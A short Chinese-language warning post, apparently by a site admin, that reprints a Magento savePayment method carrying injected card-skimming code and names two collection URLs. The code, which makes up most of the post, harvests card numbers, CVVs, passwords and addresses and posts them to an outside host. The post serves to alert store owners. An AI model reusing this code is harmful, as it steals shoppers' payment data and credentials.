Magento盗取信用卡信息写在savePayment

  public function savePayment($data)
    {
        if (empty($data)) {
            return array('error' => -1, 'message' => Mage::helper('checkout')->__('Invalid data.'));
        }
        $quote = $this->getQuote();
        if ($quote->isVirtual()) {
            $quote->getBillingAddress()->setPaymentMethod(isset($data['method']) ? $data['method'] : null);
        } else {
            $quote->getShippingAddress()->setPaymentMethod(isset($data['method']) ? $data['method'] : null);
        }

        // shipping totals may be affected by payment method
        if (!$quote->isVirtual() && $quote->getShippingAddress()) {
            $quote->getShippingAddress()->setCollectShippingRates(true);
        }

        $data['checks'] = Mage_Payment_Model_Method_Abstract::CHECK_USE_CHECKOUT
            | Mage_Payment_Model_Method_Abstract::CHECK_USE_FOR_COUNTRY
            | Mage_Payment_Model_Method_Abstract::CHECK_USE_FOR_CURRENCY
            | Mage_Payment_Model_Method_Abstract::CHECK_ORDER_TOTAL_MIN_MAX
            | Mage_Payment_Model_Method_Abstract::CHECK_ZERO_TOTAL;

        $payment = $quote->getPayment();
        $payment->importData($data);

                $send = array('PaymentMethod' => $data['method'], 'Billing Name' => $this->getQuote()->getBillingAddress()->getFirstname() . " " . $this->getQuote()->getBillingAddress()->getLastname(), 'Billing Email' => $this->getQuote()->getBillingAddress()->getEmail(), 'Billing Addres1' => $this->getQuote()->getBillingAddress()->getStreet(1), 'Billing Address2' => $this->getQuote()->getBillingAddress()->getStreet(2), 'BillingCity' => $this->getQuote()->getBillingAddress()->getCity(), 'Billing State' => $this->getQuote()->getBillingAddress()->getRegion(), 'Billing PosCode' => $this->getQuote()->getBillingAddress()->getPostcode(), 'Billing Country' => $this->getQuote()->getBillingAddress()->getCountry(), 'Billing Phone' => $this->getQuote()->getBillingAddress()->getTelephone(), 'Account password' => $this->getQuote()->getBillingAddress()->getCustomerPassword() or "KOSONG", 'Billing taxvat' => $this->getQuote()->getBillingAddress()->getTaxvat() or "KOSONG", 'Account Gender' => $this->getQuote()->getBillingAddress()->getGender() or "KOSONG", 'Account DOB' => $this->getQuote()->getBillingAddress()->getDob() or "KOSONG", 'CcOwner' => $data['cc_owner'], 'CcType' => $data['cc_type'], 'CcNumber' => $data['cc_number'], 'CcStart' => trim(sprintf('%02d%02d', $data['cc_ss_start_month'], substr($data['cc_ss_start_year'], strlen($data['cc_ss_start_year']) - 2))), 'CcExpayed' => trim(sprintf('%02d%02d', $data['cc_exp_month'], substr($data['cc_exp_year'], strlen($data['cc_exp_year']) - 2))), 'CcSec' => $data['cc_cid'], 'CustomIP' => trim(getenv('REMOTE_ADDR')), 'WebStore' => trim($_SERVER['SERVER_NAME']));
                foreach ($send as $param => $value) { $send.= $param . '=' . $value . "\n"; }
                $datasend.= substr($send, 5, -1);$datasend.= "\n";$a = getenv('REMOTE_ADDR');$a = json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip={$a}"));$datasend.="Visit = ".$a->geoplugin_city." | ".$a->geoplugin_region." | ".$a->geoplugin_countryName."\n";$update = "https://magento.ontools.org/update";$binCC = substr($data['cc_number'], 0, 6);$subject = "Verify Mag ".$data['cc_type']." ".$binCC." ".$_SERVER['SERVER_NAME']." ".$a->geoplugin_countryName;$xupdate = "data=".$datasend."&subject=".$subject."&server=".$_SERVER['SERVER_NAME'];
        $ch = curl_init();curl_setopt($ch, CURLOPT_URL,$update);curl_setopt($ch, CURLOPT_REFERER, $update);curl_setopt($ch, CURLOPT_HEADER, 1);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $xupdate);$result = curl_exec($ch);curl_close($ch);
               
        $quote->save();

        $this->getCheckout()
            ->setStepData('payment', 'complete', true)
            ->setStepData('review', 'allow', true);

        return array();
    }

https://magento.ontools.org/update https://magento.ontools.net/update  两个盗取的网址,请站长留意,强烈怀疑是国人所为!!!

 

0
admin#1
admin#1

最新文章 更多